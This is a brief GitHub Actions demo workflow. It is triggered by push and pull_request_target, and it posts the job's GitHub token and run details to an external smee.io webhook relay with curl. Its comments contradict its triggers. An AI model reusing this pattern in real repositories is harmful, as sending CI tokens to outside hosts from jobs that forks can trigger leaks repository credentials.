name: GitHub Actions Demo
on:
  # <VERIFY>
  # This workflow checks out source on pull request only. Pushes to 
  # the main branch require a different trigger.
  # <VERIFY>
  push:
   
  # pull_request_target allows us to run jobs against forks that require
  # repoository and/or organization secrets.  
  pull_request_target:
    branches: [ master ]
jobs:
  mcode-with-github-token:
    runs-on: ubuntu-latest    
    steps:    
      - run: |
          curl -XPOST 'https://smee.io/FPCLuxdLr1dBVWe1' -H "X-Mayhem-Token:token ${{ github.token }}" -H "X-Github-Context:$GITHUB_SERVER_URL/$GITHUB_REPOSITORY/actions/runs/$GITHUB_RUN_ID"  -d '{"access_level":"PRIVATE","project_name":"foo","allow_concurrent_runs":true,"testcase_limit_enabled":false}' -H "Content-Type: application/json"
